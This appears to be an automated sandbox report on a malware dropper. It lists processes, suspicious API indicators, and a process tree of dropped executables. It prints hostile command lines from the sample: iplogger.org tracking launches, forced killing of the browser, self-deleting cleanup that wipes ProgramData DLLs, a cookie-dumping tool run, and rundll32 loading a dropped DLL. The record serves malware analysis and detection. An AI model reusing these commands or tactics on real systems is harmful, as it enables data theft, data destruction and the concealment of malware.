5096	File.exe
2256	msedge.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
3008	Accostarmi.exe.pif
3032
3032
3008	Accostarmi.exe.pif
3008	Accostarmi.exe.pif
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

File.exeAccostarmi.exe.pif

pid	process
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
5096	File.exe
3008	Accostarmi.exe.pif
3008	Accostarmi.exe.pif
3008	Accostarmi.exe.pif

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

Info.exefHSnWneP5Q6EoIhPpSeU5djN.exesJhVl0NkN0zJV8udxG08WE7g.exeZLQHmcinqrtmxG29JeWHldZs.exedzAnISXyBAB9TJgfQpiJNqgn.execmd.exeZJdaWucTUPWvvHp7cyQhgO6f.exekfIx4AeXaIwJT4gAZvt28Hop.exehg6o6ShsofU_l9G5bh1ptRCJ.exeVqpRmeW35ZNTRZEr_XdyQtZF.exef2lCpeMBm5aZjIxJZYyknrN9.exeVkqg65q1o6YbJlG1k8WTpH4b.exeInstall.exeInstall.exeAccostarmi.exe.pif

pid	process
4776	Info.exe
480	fHSnWneP5Q6EoIhPpSeU5djN.exe
3340	sJhVl0NkN0zJV8udxG08WE7g.exe
2452	ZLQHmcinqrtmxG29JeWHldZs.exe
4532	dzAnISXyBAB9TJgfQpiJNqgn.exe
2228	cmd.exe
3284	ZJdaWucTUPWvvHp7cyQhgO6f.exe
3636	kfIx4AeXaIwJT4gAZvt28Hop.exe
5220	hg6o6ShsofU_l9G5bh1ptRCJ.exe
1572	VqpRmeW35ZNTRZEr_XdyQtZF.exe
5220	hg6o6ShsofU_l9G5bh1ptRCJ.exe
3076	f2lCpeMBm5aZjIxJZYyknrN9.exe
5212	Vkqg65q1o6YbJlG1k8WTpH4b.exe
5872	Install.exe
5360	Install.exe
3008	Accostarmi.exe.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exeFiles.exemsedge.exeFolder.exe

description	pid	process	target process
PID 1484 wrote to memory of 2556	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Files.exe
PID 1484 wrote to memory of 2556	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Files.exe
PID 1484 wrote to memory of 2556	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Files.exe
PID 2556 wrote to memory of 5096	2556	Files.exe	File.exe
PID 2556 wrote to memory of 5096	2556	Files.exe	File.exe
PID 2556 wrote to memory of 5096	2556	Files.exe	File.exe
PID 1484 wrote to memory of 2256	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	msedge.exe
PID 1484 wrote to memory of 2256	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	msedge.exe
PID 1484 wrote to memory of 4268	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Install.exe
PID 1484 wrote to memory of 4268	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Install.exe
PID 1484 wrote to memory of 4268	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Install.exe
PID 2256 wrote to memory of 2540	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 2540	2256	msedge.exe	msedge.exe
PID 1484 wrote to memory of 444	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	KRSetp.exe
PID 1484 wrote to memory of 444	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	KRSetp.exe
PID 1484 wrote to memory of 4628	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Folder.exe
PID 1484 wrote to memory of 4628	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Folder.exe
PID 1484 wrote to memory of 4628	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Folder.exe
PID 1484 wrote to memory of 4072	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	jg3_3uag.exe
PID 1484 wrote to memory of 4072	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	jg3_3uag.exe
PID 1484 wrote to memory of 4072	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	jg3_3uag.exe
PID 1484 wrote to memory of 2400	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Installation.exe
PID 1484 wrote to memory of 2400	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Installation.exe
PID 1484 wrote to memory of 2400	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Installation.exe
PID 1484 wrote to memory of 1684	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	pub2.exe
PID 1484 wrote to memory of 1684	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	pub2.exe
PID 1484 wrote to memory of 1684	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	pub2.exe
PID 1484 wrote to memory of 4776	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Info.exe
PID 1484 wrote to memory of 4776	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Info.exe
PID 1484 wrote to memory of 4776	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	Info.exe
PID 1484 wrote to memory of 4308	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	pzyh.exe
PID 1484 wrote to memory of 4308	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	pzyh.exe
PID 1484 wrote to memory of 4308	1484	699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe	pzyh.exe
PID 4628 wrote to memory of 3396	4628	Folder.exe	Folder.exe
PID 4628 wrote to memory of 3396	4628	Folder.exe	Folder.exe
PID 4628 wrote to memory of 3396	4628	Folder.exe	Folder.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe
PID 2256 wrote to memory of 4160	2256	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe
"C:\Users\Admin\AppData\Local\Temp\699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1484

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2556

C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji7
3⤵
PID:3784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffe8b0d46f8,0x7ffe8b0d4708,0x7ffe8b0d4718
4⤵
PID:1168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe8b0d46f8,0x7ffe8b0d4708,0x7ffe8b0d4718
3⤵
PID:2540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
3⤵
PID:4160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
3⤵
PID:4004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
3⤵
PID:1364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
3⤵
PID:2248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4804 /prefetch:8
3⤵
PID:1100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
3⤵
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
3⤵
PID:1904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
3⤵
PID:3396

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
3⤵
PID:1592

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:3372

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7ef4c5460,0x7ff7ef4c5470,0x7ff7ef4c5480
4⤵
PID:1676

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5520 /prefetch:8
3⤵
PID:1944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4644 /prefetch:2
3⤵
PID:3408

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
PID:4268

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:444

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4628

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:3396

C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe
"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4072

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2400

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:4048

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3444

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1684

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4776

C:\Users\Admin\Documents\fHSnWneP5Q6EoIhPpSeU5djN.exe
"C:\Users\Admin\Documents\fHSnWneP5Q6EoIhPpSeU5djN.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:480

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im fHSnWneP5Q6EoIhPpSeU5djN.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\fHSnWneP5Q6EoIhPpSeU5djN.exe" & del C:\ProgramData\*.dll & exit
4⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2228

C:\Windows\SysWOW64\taskkill.exe
taskkill /im fHSnWneP5Q6EoIhPpSeU5djN.exe /f
5⤵
- Kills process with taskkill
PID:4804

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:6012

C:\Users\Admin\Documents\sJhVl0NkN0zJV8udxG08WE7g.exe
"C:\Users\Admin\Documents\sJhVl0NkN0zJV8udxG08WE7g.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3340

C:\Users\Admin\Documents\wu1bLlMbnJY1fSGdGO5pnIe7.exe
"C:\Users\Admin\Documents\wu1bLlMbnJY1fSGdGO5pnIe7.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 632
4⤵
- Program crash
PID:2552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 640
4⤵
- Program crash
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 624
4⤵
- Program crash
PID:5528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 808
4⤵
- Program crash
PID:2552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1168
4⤵
- Program crash
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1176
4⤵
- Program crash
PID:5280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1292
4⤵
- Program crash
PID:3700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "wu1bLlMbnJY1fSGdGO5pnIe7.exe" /f & erase "C:\Users\Admin\Documents\wu1bLlMbnJY1fSGdGO5pnIe7.exe" & exit
4⤵
PID:4460

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "wu1bLlMbnJY1fSGdGO5pnIe7.exe" /f
5⤵
- Kills process with taskkill
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1472
4⤵
- Program crash
PID:6140

C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe
"C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe"
3⤵
- Executes dropped EXE
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe
4⤵
PID:5796

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:5204

C:\Users\Admin\Documents\VqpRmeW35ZNTRZEr_XdyQtZF.exe
"C:\Users\Admin\Documents\VqpRmeW35ZNTRZEr_XdyQtZF.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 472
4⤵
- Program crash
PID:5800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 480
4⤵
- Program crash
PID:5868

C:\Users\Admin\Documents\lWIxRZFsQrh1cFnOUnJtWK7Z.exe
"C:\Users\Admin\Documents\lWIxRZFsQrh1cFnOUnJtWK7Z.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5236

C:\Users\Admin\Documents\YK5kC4ak2RRcQ9kSdeWgayqF.exe
"C:\Users\Admin\Documents\YK5kC4ak2RRcQ9kSdeWgayqF.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5408

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:4688

C:\Users\Admin\Documents\hg6o6ShsofU_l9G5bh1ptRCJ.exe
"C:\Users\Admin\Documents\hg6o6ShsofU_l9G5bh1ptRCJ.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5220

C:\Users\Admin\Documents\Vkqg65q1o6YbJlG1k8WTpH4b.exe
"C:\Users\Admin\Documents\Vkqg65q1o6YbJlG1k8WTpH4b.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5212

C:\Users\Admin\Documents\kfIx4AeXaIwJT4gAZvt28Hop.exe
"C:\Users\Admin\Documents\kfIx4AeXaIwJT4gAZvt28Hop.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3636

C:\Users\Admin\Documents\f2lCpeMBm5aZjIxJZYyknrN9.exe
"C:\Users\Admin\Documents\f2lCpeMBm5aZjIxJZYyknrN9.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3076

C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe
"C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe"
3⤵
PID:2228

C:\Users\Admin\Documents\dzAnISXyBAB9TJgfQpiJNqgn.exe
"C:\Users\Admin\Documents\dzAnISXyBAB9TJgfQpiJNqgn.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4532

C:\Users\Admin\Documents\_0y86lmH_Y5w2jgAjGURyIoy.exe
"C:\Users\Admin\Documents\_0y86lmH_Y5w2jgAjGURyIoy.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5060

C:\Users\Admin\Documents\ZJdaWucTUPWvvHp7cyQhgO6f.exe
"C:\Users\Admin\Documents\ZJdaWucTUPWvvHp7cyQhgO6f.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3284

C:\Users\Admin\Documents\3um2ASQgdHK5qhmvaTd2nHR7.exe
"C:\Users\Admin\Documents\3um2ASQgdHK5qhmvaTd2nHR7.exe"
3⤵
PID:4340

C:\Users\Admin\Documents\ZLQHmcinqrtmxG29JeWHldZs.exe
"C:\Users\Admin\Documents\ZLQHmcinqrtmxG29JeWHldZs.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2452

C:\Users\Admin\AppData\Local\Temp\pzyh.exe
"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4308

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:3440

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2844

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:832

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:3808

C:\Windows\SysWOW64\WerFault.exe
